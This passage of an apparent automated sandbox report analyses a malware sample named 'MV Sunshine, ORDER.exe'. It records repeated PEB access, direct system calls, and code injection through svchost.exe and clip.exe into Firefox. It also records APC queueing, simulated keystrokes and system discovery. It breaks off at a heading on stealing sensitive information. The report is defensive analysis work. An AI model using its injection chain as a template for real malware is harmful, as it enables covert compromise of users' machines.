            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039649D0 mov eax, dword ptr fs:[00000030h]1_2_039649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA9D3 mov eax, dword ptr fs:[00000030h]1_2_039FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C69C0 mov eax, dword ptr fs:[00000030h]1_2_039C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039629F9 mov eax, dword ptr fs:[00000030h]1_2_039629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039629F9 mov eax, dword ptr fs:[00000030h]1_2_039629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE9E0 mov eax, dword ptr fs:[00000030h]1_2_039BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC912 mov eax, dword ptr fs:[00000030h]1_2_039BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928918 mov eax, dword ptr fs:[00000030h]1_2_03928918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928918 mov eax, dword ptr fs:[00000030h]1_2_03928918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE908 mov eax, dword ptr fs:[00000030h]1_2_039AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE908 mov eax, dword ptr fs:[00000030h]1_2_039AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B892A mov eax, dword ptr fs:[00000030h]1_2_039B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C892B mov eax, dword ptr fs:[00000030h]1_2_039C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0946 mov eax, dword ptr fs:[00000030h]1_2_039B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D4978 mov eax, dword ptr fs:[00000030h]1_2_039D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D4978 mov eax, dword ptr fs:[00000030h]1_2_039D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC97C mov eax, dword ptr fs:[00000030h]1_2_039BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03956962 mov eax, dword ptr fs:[00000030h]1_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03956962 mov eax, dword ptr fs:[00000030h]1_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03956962 mov eax, dword ptr fs:[00000030h]1_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E mov eax, dword ptr fs:[00000030h]1_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E mov edx, dword ptr fs:[00000030h]1_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E mov eax, dword ptr fs:[00000030h]1_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC89D mov eax, dword ptr fs:[00000030h]1_2_039BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930887 mov eax, dword ptr fs:[00000030h]1_2_03930887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E8C0 mov eax, dword ptr fs:[00000030h]1_2_0395E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C8F9 mov eax, dword ptr fs:[00000030h]1_2_0396C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C8F9 mov eax, dword ptr fs:[00000030h]1_2_0396C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA8E4 mov eax, dword ptr fs:[00000030h]1_2_039FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC810 mov eax, dword ptr fs:[00000030h]1_2_039BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]1_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]1_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]1_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov ecx, dword ptr fs:[00000030h]1_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]1_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]1_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A830 mov eax, dword ptr fs:[00000030h]1_2_0396A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D483A mov eax, dword ptr fs:[00000030h]1_2_039D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D483A mov eax, dword ptr fs:[00000030h]1_2_039D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960854 mov eax, dword ptr fs:[00000030h]1_2_03960854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934859 mov eax, dword ptr fs:[00000030h]1_2_03934859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934859 mov eax, dword ptr fs:[00000030h]1_2_03934859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03942840 mov ecx, dword ptr fs:[00000030h]1_2_03942840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE872 mov eax, dword ptr fs:[00000030h]1_2_039BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE872 mov eax, dword ptr fs:[00000030h]1_2_039BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6870 mov eax, dword ptr fs:[00000030h]1_2_039C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6870 mov eax, dword ptr fs:[00000030h]1_2_039C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03962F98 mov eax, dword ptr fs:[00000030h]1_2_03962F98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03962F98 mov eax, dword ptr fs:[00000030h]1_2_03962F98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CF80 mov eax, dword ptr fs:[00000030h]1_2_0396CF80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04FE7 mov eax, dword ptr fs:[00000030h]1_2_03A04FE7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392EFD8 mov eax, dword ptr fs:[00000030h]1_2_0392EFD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392EFD8 mov eax, dword ptr fs:[00000030h]1_2_0392EFD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392EFD8 mov eax, dword ptr fs:[00000030h]1_2_0392EFD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932FC8 mov eax, dword ptr fs:[00000030h]1_2_03932FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932FC8 mov eax, dword ptr fs:[00000030h]1_2_03932FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932FC8 mov eax, dword ptr fs:[00000030h]1_2_03932FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932FC8 mov eax, dword ptr fs:[00000030h]1_2_03932FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03970FF6 mov eax, dword ptr fs:[00000030h]1_2_03970FF6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03970FF6 mov eax, dword ptr fs:[00000030h]1_2_03970FF6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03970FF6 mov eax, dword ptr fs:[00000030h]1_2_03970FF6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03970FF6 mov eax, dword ptr fs:[00000030h]1_2_03970FF6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E6FF7 mov eax, dword ptr fs:[00000030h]1_2_039E6FF7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932F12 mov eax, dword ptr fs:[00000030h]1_2_03932F12
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CF1F mov eax, dword ptr fs:[00000030h]1_2_0396CF1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E6F00 mov eax, dword ptr fs:[00000030h]1_2_039E6F00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EF28 mov eax, dword ptr fs:[00000030h]1_2_0395EF28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392CF50 mov eax, dword ptr fs:[00000030h]1_2_0392CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392CF50 mov eax, dword ptr fs:[00000030h]1_2_0392CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392CF50 mov eax, dword ptr fs:[00000030h]1_2_0392CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392CF50 mov eax, dword ptr fs:[00000030h]1_2_0392CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392CF50 mov eax, dword ptr fs:[00000030h]1_2_0392CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392CF50 mov eax, dword ptr fs:[00000030h]1_2_0392CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CF50 mov eax, dword ptr fs:[00000030h]1_2_0396CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04F68 mov eax, dword ptr fs:[00000030h]1_2_03A04F68
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D0F50 mov eax, dword ptr fs:[00000030h]1_2_039D0F50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4F40 mov eax, dword ptr fs:[00000030h]1_2_039B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4F40 mov eax, dword ptr fs:[00000030h]1_2_039B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4F40 mov eax, dword ptr fs:[00000030h]1_2_039B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4F40 mov eax, dword ptr fs:[00000030h]1_2_039B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395AF69 mov eax, dword ptr fs:[00000030h]1_2_0395AF69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395AF69 mov eax, dword ptr fs:[00000030h]1_2_0395AF69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392AE90 mov eax, dword ptr fs:[00000030h]1_2_0392AE90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392AE90 mov eax, dword ptr fs:[00000030h]1_2_0392AE90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392AE90 mov eax, dword ptr fs:[00000030h]1_2_0392AE90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03962E9C mov eax, dword ptr fs:[00000030h]1_2_03962E9C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03962E9C mov ecx, dword ptr fs:[00000030h]1_2_03962E9C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039CAEB0 mov eax, dword ptr fs:[00000030h]1_2_039CAEB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039CAEB0 mov eax, dword ptr fs:[00000030h]1_2_039CAEB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BCEA0 mov eax, dword ptr fs:[00000030h]1_2_039BCEA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BCEA0 mov eax, dword ptr fs:[00000030h]1_2_039BCEA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BCEA0 mov eax, dword ptr fs:[00000030h]1_2_039BCEA0
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009D81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_009D81F7
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009AA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009AA395
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009AA364 SetUnhandledExceptionFilter,0_2_009AA364

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeThread register set: target process: 7868Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeThread APC queued: target process: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeJump to behavior
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2FF1008Jump to behavior
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009D8C93 LogonUserW,0_2_009D8C93
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_00983B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00983B4C
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_00984A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00984A35
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009E4EC9 mouse_event,0_2_009E4EC9
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MV Sunshine, ORDER.exe"Jump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009D81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_009D81F7
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009E4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_009E4C03
            Source: MV Sunshine, ORDER.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: MV Sunshine, ORDER.exe, QAjjirwAoAEExvw.exe, 00000002.00000002.4133436886.0000000001431000.00000002.00000001.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000002.00000000.1798122707.0000000001430000.00000002.00000001.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4133623639.0000000001861000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: QAjjirwAoAEExvw.exe, 00000002.00000002.4133436886.0000000001431000.00000002.00000001.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000002.00000000.1798122707.0000000001430000.00000002.00000001.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4133623639.0000000001861000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: QAjjirwAoAEExvw.exe, 00000002.00000002.4133436886.0000000001431000.00000002.00000001.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000002.00000000.1798122707.0000000001430000.00000002.00000001.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4133623639.0000000001861000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: QAjjirwAoAEExvw.exe, 00000002.00000002.4133436886.0000000001431000.00000002.00000001.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000002.00000000.1798122707.0000000001430000.00000002.00000001.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4133623639.0000000001861000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009A886B cpuid 0_2_009A886B
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009B50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_009B50D7
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009C2230 GetUserNameW,0_2_009C2230
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009B418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_009B418A
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_00984AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00984AFE

            Stealing of Sensitive Information

